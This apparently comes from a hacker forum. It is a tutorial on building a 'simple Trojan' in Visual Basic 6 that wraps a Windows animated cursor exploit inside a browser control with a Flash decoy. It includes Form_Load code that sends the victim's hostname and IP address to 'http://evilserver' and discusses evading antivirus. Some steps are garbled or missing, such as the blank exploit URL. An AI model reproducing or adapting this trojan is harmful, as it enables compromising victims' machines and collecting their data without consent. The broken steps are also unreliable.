Simple Trojan using 0-Day Exploit:

Greetz: Edu, Str0keDarkPontifex, Euan

I am using “Windows Animated Cursor Handling Exploit (0day) (Version3) by jamikazu” to demonstrate this Example.

Technical Details:

Tested on:

Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)

Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)

Windows XP SP2

 Target System: Windows xpsp2 fully patched version, with internet explorer 7(Beta3)

So I installed IE7 Beta3 on my Pc. Start VisualBasic6.0

With Standard EXE project.

Then add Ieframe.dll, you will get an error that “File Not Found”. This is because IE7 replaces Ieframe.dll controls. Let me explain you what is IEframe.dll

 Ieframe.dll is a simple VB-browser or browser control

We can use this as   wb1.navigate (

Ieframe.dll comes with vb6.0 but after installing IE7, ieframe.dll become useless because

IE7 has its own cookie for vb6.0 shdocvw.dll J.How over come the error? I will show below

Browse Shdocvw.dll After adding it points Microsoft internet controls. Then press Apply

Also add Mswinsck.ocx ,flash9b.dll

Drag browser control (shdocvw.dll) to from toolbox along with flash9b.dll, mswinsck.ock

Then Drag flash ocx and add your favorite swf to it. Then drag shdocvw.dll but make

Sure that the size is smaller as shown in the figure. Because our idea is to execute the

The url size doesn’t matter..


Then problem of this code executing IE was DEP. Then advantage with this Trojan is

It doesn’t have DEP at all. As we include components with this application.

It doesn’t even rely on system .dlls or activex controls

The reason why I dint added processes hiding code is, easily detected by AV’s

Add the following code

Private Sub Form_Load()

Dim hsname As String

Dim ipaddr As String

hsname = winsck.LocalHostName

ipaddr = winsck.LocalIP

Wb.Navigate ("")

Wb.Navigate2 ("http://evilserver/hsname ipaddr")


End Sub


Wb is the browser control and Wb.Navigate loads the exploit.

Wb.naviagate2 sends victim’s ip and host name to attacker

Winsck is MSwinsck.ocx (Winsock)


Then compile it and Run

[Source:     ]